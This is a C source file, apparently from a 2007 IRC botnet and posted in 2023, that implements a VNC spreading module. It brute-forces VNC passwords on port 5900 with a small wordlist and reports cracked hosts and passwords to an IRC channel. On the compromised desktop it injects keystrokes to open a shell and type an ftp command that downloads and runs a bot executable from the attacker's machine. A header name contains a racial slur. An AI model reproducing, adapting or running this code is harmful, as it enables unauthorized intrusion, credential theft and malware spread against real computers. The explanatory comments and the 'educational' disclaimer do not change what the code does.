
vncexploit.c

Dec 23rd, 2023
  1. /*
  2.  *      vncexploit.c 2007 Ravo_5002
  3.  *      This code is for educational purposes only...
  4.  *      Took some code from dej and from tightvnc :)
  5.  */
  6.  
  7. #include <stdio.h>
  8. #include <winsock.h>
  9. #include <windows.h>
  10.  
  11. #include "vncexploit.h"
  12. #include "niggerbot.h"
  13. #include "config.h"
  14. #include "d3des.h"
  15.  
/*
 * Send one RFB KeyEvent (message type 4) for the 16-bit keysym (bkey, key).
 *
 * sock  - connected VNC socket
 * bkey  - high byte of the keysym (0xff for the X11 special keys used by
 *         VNCRoot, 0 for plain ASCII characters)
 * key   - low byte of the keysym
 * state - 0 = release, 1 = press, >1 = press immediately followed by release
 *         (i.e. the key is "typed"); any other value is sent as a press only
 *
 * Wire layout written below: [type=0x04][down-flag][2 pad][4-byte keysym,
 * big-endian]. Return values of send() are not checked, so a dropped
 * connection goes unnoticed.
 */
void SendKey(SOCKET sock, char bkey, char key, int state)
{
   char sendkey[8];

   // compose packet: byte 0 is the KeyEvent message type
   memset(sendkey, '\x04', 1);

   // byte 1 is the down-flag; anything that is not 0/1 starts as a press
   if (state == 0 || state == 1)
      memset(sendkey + 1, state, 1);
   else
      memset(sendkey + 1, 1, 1);

   // bytes 2..5: padding plus the two high (always zero) keysym bytes
   memset(sendkey + 2, 0, 4);
   memset(sendkey + 6, bkey, 1);
   memset(sendkey + 7, key, 1);

   send(sock, sendkey, sizeof(sendkey), 0);

   if (state > 1)
   {
      // follow the press with a release of the same keysym
      memset(sendkey + 1, 0, 1);
      send(sock, sendkey, sizeof(sendkey), 0);
   }
}
  40.  
/*
 * Post-authentication stage: drive the remote Windows desktop by injecting
 * keystrokes over the already-authenticated VNC socket sVNC.
 *
 * Sequence as written below: Enter (dismiss a screensaver), Ctrl+Esc
 * (Start menu), Up three times, Enter (presumably to reach a Run/command
 * entry on a Windows 2000 layout -- TODO confirm), type "command", Enter,
 * type the ftp command line, Enter, Enter, type "exit", Enter. Fixed
 * Sleep()s pace the typing. Nothing is read back from the server, so the
 * routine never learns whether any step succeeded.
 *
 * sVNC - authenticated VNC socket
 * ftp  - NUL-terminated command line to type into the spawned shell
 *        (built by vnccheck)
 *
 * Keysyms are X11 values with the 0xff prefix in bkey: Control_L 0xffe3,
 * Up 0xff52, Return 0xff0d, Escape 0xff1b. On the victim this shows up as
 * interactive console activity (command.com / ftp.exe) inside a VNC session.
 */
void VNCRoot(SOCKET sVNC, char *ftp) {
   char text_cmd[] = "command";
   char text_exit[] = "exit";
   char bkey = '\xff',
       keyctrl = '\xe3',

keyup = '\x52',
       keyenter = '\x0d',
       keyesc = '\x1b';
   unsigned int i;

   Sleep(2000);

   //Press ENTER (in case of screensaver)
   SendKey(sVNC, bkey, keyenter, 2);
   Sleep(500);

   Sleep(2000);
// Ctrl+Esc: press both, hold 100 ms, release both (opens the Start menu)
SendKey(sVNC, bkey, keyctrl, 1);
SendKey(sVNC, bkey, keyesc, 1);
Sleep(100);
SendKey(sVNC, bkey, keyctrl, 0);
SendKey(sVNC, bkey, keyesc, 0);
   //If its Windows2k: walk up the Start menu three entries
   
   for (i = 0; i < 3; i++)
   {
      SendKey(sVNC, bkey, keyup, 2);
      Sleep(500);
   }

   //Press ENTER
   SendKey(sVNC, bkey, keyenter, 2);
   Sleep(2000);

   //type in "command" one character at a time (bkey 0 = plain ASCII keysym)
   for (i = 0; i < strlen(text_cmd); i++)
   {
      SendKey(sVNC, 0, text_cmd[i], 2);
      Sleep(125);
   }

   //press ENTER
   SendKey(sVNC, bkey, keyenter, 2);
   Sleep(2000);

   //send ftp line
   for (i = 0; i < strlen(ftp); i++)
   {
      SendKey(sVNC, 0, ftp[i], 2);
      Sleep(125);
   }
   
   //press ENTER
   SendKey(sVNC, bkey, keyenter, 2);
   Sleep(2000);
   
   SendKey(sVNC, bkey, keyenter, 2);
   //type in "exit" to close the shell window
   for (i = 0; i < strlen(text_exit); i++)
   {
      SendKey(sVNC, 0, text_exit[i], 2);
      Sleep(125);
   }
      //press ENTER
   SendKey(sVNC, bkey, keyenter, 2);
   Sleep(2000);  
}
  109.  
/*
 * Block until exactly `wanted` bytes have been received into inbuf.
 *
 * Returns 1 when all bytes arrived, 0 if the peer closed the connection
 * (recv returned 0) or a socket error occurred; on 0 inbuf holds only a
 * partial read. inbuf is not NUL-terminated and its size is not checked
 * against `wanted` -- the caller must size it.
 */
int ReadExact(SOCKET r_sock, char *inbuf, int wanted) {

   int offset = 0;
   
   while (wanted > 0) {
      int bytes = recv(r_sock, inbuf+offset, wanted, 0);
      if ((bytes == 0) || (bytes == SOCKET_ERROR)) return 0;
      wanted -= bytes;
      offset += bytes;
   }

   return 1;
}
  123.  
/*
 * Send all `bytes` bytes of buf, looping over short sends.
 *
 * Returns 1 on success, 0 on a socket error or a zero-length send, and
 * FALSE (also 0) when bytes == 0, so callers cannot tell "nothing to send"
 * from failure. Every caller in this file ignores the return value.
 */
int WriteExact(SOCKET w_sock, char *buf, int bytes) {

   if (bytes == 0) return FALSE;

   int i = 0;    // bytes sent so far
    int j;       // result of the latest send()

    while (i < bytes) {
      j = send(w_sock, buf+i, bytes-i, 0);
      if (j == SOCKET_ERROR || j==0) return 0;
      i += j;
    }

   return 1;
}
  139.  
/*
 * RFB "VNC Authentication" response: DES-encrypt the 16-byte challenge in
 * place as two independent 8-byte blocks, keyed with the password
 * truncated or NUL-padded to 8 bytes.
 *
 * bytes  - 16-byte challenge buffer, overwritten with the response
 * passwd - NUL-terminated password; only its first 8 characters are used
 *
 * deskey()/des() and EN0 come from d3des.h (not visible here). This is the
 * standard, and weak, VNC password scheme: single DES with a key derived
 * from at most 8 password characters.
 */
void vncEncryptBytes(unsigned char *bytes, char *passwd) {
    unsigned char key[8];
    unsigned int i;

    /* key is simply password padded with nulls */

    for (i = 0; i < 8; i++) {
    if (i < strlen(passwd)) {
        key[i] = passwd[i];
    } else {
        key[i] = 0;
    }
    }

    deskey(key, EN0);   // schedule the key for encryption

    // encrypt both 8-byte halves of the challenge in place (ECB)
    for (i = 0; i < 16; i += 8) {
        des(bytes+i, bytes+i);
    }
}
  160.  
/*
 * Try one password against the VNC server at host:5900 and report the
 * outcome to the IRC connection ircconn.
 *
 * Flow: connect; read the 12-byte ProtocolVersion banner and echo it back
 * (accepting the server's version); read the 4-byte security-type reply.
 *   type 1 (None)     -> PRIVMSG CHANNEL, run VNCRoot, close, return 1
 *   type 2 (VNC auth) -> read 16-byte challenge, answer with passwd, read
 *                        the 4-byte SecurityResult:
 *                          0 -> PRIVMSG CHANNEL with the password, run
 *                               VNCRoot, close, return 1
 *                          1 -> return 0 (wrong password)
 *                          the "too many connections" branch is unreachable
 *                          (see inline note), so 2 is never returned
 *   anything else     -> return 1 or fall through to close and return 0
 *
 * Return: 1 = stop working on this host (open server, hit, unreachable, or
 * refused), 0 = try the next password, 2 = documented but never produced.
 * The socket is only closed on the two success paths and the fall-through
 * path; every other return leaks it.
 *
 * CHANNEL, FTPPORT, BOTNAME and getlocalip() are defined in the included
 * headers and are not visible here.
 *
 * Observable footprint: cleartext IRC PRIVMSG carrying host, version and
 * (on a hit) the password; on the victim, an ftp script file "ravo"
 * created and deleted in the shell's working directory, ftp.exe run with
 * -n -v -s:ravo, then BOTNAME executed.
 */
int vnccheck(char *host, char *passwd, SOCKET ircconn) {

    SOCKET sock;
    SOCKADDR_IN ssin;
    ssin.sin_family = AF_INET;
    ssin.sin_port = htons(5900);           // fixed port: VNC display :0 only
    ssin.sin_addr.s_addr= inet_addr(host); // host must be a dotted quad
   
    sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
    if(connect(sock, (LPSOCKADDR)&ssin, sizeof(ssin))) {
        //printf("[-] Could not connect\n");
        return 1;   // sock is not closed on this path
    }
   
    char buff[4096];
   
    // Command line later typed into the victim's shell by VNCRoot: writes an
    // ftp script "ravo" that fetches BOTNAME from this machine (local IP,
    // FTPPORT, user "Ravo"/pass "5002"), runs ftp on it, deletes it and
    // starts BOTNAME.
    char ftpline[256];
    sprintf(ftpline, "echo open %s %d > ravo &echo user %s %s >> ravo &echo get %s >> ravo &echo bye >> ravo &ftp -n -v -s:ravo &del ravo &%s\r\n", getlocalip(), FTPPORT, "Ravo", "5002", BOTNAME, BOTNAME);

    // 12-byte banner such as "RFB 003.003\n". It is not NUL-terminated, so the
    // strstr/strtok/atoi calls below read past the end of the array.
    unsigned char vncversion[12];
    ReadExact(sock, vncversion, sizeof(vncversion));
    if(strstr(vncversion, "RFB")) {
        WriteExact(sock, vncversion, sizeof(vncversion)); // accept the server's version
        strtok(vncversion, " ");
        int versa = atoi(strtok(NULL, "."));   // major
        int versb = atoi(strtok(NULL, "\n"));  // minor
        //printf("[+] Found VNC %d.%d\n", versa, versb);

        // Security-type reply. Testing both auth[1] and auth[3] presumably
        // covers RFB 3.3 (one 4-byte big-endian type) and 3.7+ (a count byte
        // followed by 1-byte types) -- TODO confirm.
        char auth[4];
        ReadExact(sock, auth, 4);

        if(auth[1] == 1 || auth[3] == 1) {
            // security type 1 = None: server accepts anyone
            //printf("[+] VNC NoAuth!\n");
            sprintf(buff, "PRIVMSG %s :VNC v%d.%d with no pass on host %s\n", CHANNEL, versa, versb, host);
            send(ircconn,buff, strlen(buff), 0);  // cleartext report to the IRC channel
            WriteExact(sock, "\0", 1);            // presumably the ClientInit shared-flag
            VNCRoot(sock, ftpline);
            closesocket(sock);
            return 1;
        }
        else if(auth[1] == 2 || auth[3] == 2) {
            // security type 2 = VNC Authentication (DES challenge/response)
            //printf("[+] VNC needs pass lets brewtf0rc3\n");
            char funk[1];
            //funk = "0\n";
            funk[0] = auth[1];
            //funk[1] = '\n';
            //printf("funk:\n%s\n%d %d\n", funk, funk[0], funk[1]);
           
            // Echo the security type back: a 3.7+ server only sends the
            // challenge after the client selects a type.
            WriteExact(sock, funk, 1);
            unsigned char challenge[16];
            ReadExact(sock, challenge, 16);


            vncEncryptBytes(challenge, passwd);
           
            WriteExact(sock, challenge, 16); // 16-byte DES response
           
            // 4-byte SecurityResult; only the low byte is examined
            unsigned char status[4];
            ReadExact(sock, status, 4);
            if(status[3] == 0) {
                //printf("[+] pass ok\n")
                // Reports the working password in cleartext over IRC.
                sprintf(buff, "PRIVMSG %s :[VNC] v%d.%d with pass %s on ip %s\n", CHANNEL, versa, versb, passwd, host);
                send(ircconn,buff, strlen(buff), 0);
                WriteExact(sock, "\0", 1);   // presumably the ClientInit shared-flag
                VNCRoot(sock, ftpline);
                closesocket(sock);
                return 1;
            }
            else if(status[3] == 1) {
                //printf("[-] pass wrong\n");
                return 0;   // socket is not closed on this path
            }
            else if(status[3] == 1) {
                // Duplicates the condition above, so this branch is never taken
                // and vnccheck never returns 2.
                //printf("[-] 2much connections\n");
                return 2;
            }
        }
        else if(auth[1] ==0) {
            // presumably the "connection failed" reply; give up on this host
            // (socket is not closed on this path)
            return 1;
        }
    }
    closesocket(sock);
    return 0;
}
  246.  
/*
 * Run the built-in wordlist against a single host: call vnccheck for each
 * password until it reports 1 (open server, a hit, or an unreachable /
 * refusing host). A status of 2 triggers a 20 s back-off; every attempt
 * is followed by a 0.5 s pause.
 *
 * ircconn - IRC socket that vnccheck reports to
 * ip      - dotted-quad target handed to vnccheck / inet_addr()
 */
void vncscan(SOCKET ircconn, char *ip) {
    char *passes[] = { "1234", "password", "12345678", "qwerty", "123", "vnc", "login", NULL };
    int i = 0;
    int status;
    while(passes[i] != NULL) {
        status = vnccheck(ip, passes[i], ircconn);
        if(status == 1) break;        // done with this host
        if(status == 2) Sleep(20000); // server asked us to back off
        i++;
        Sleep(500);
    }
    return;
}
  260.  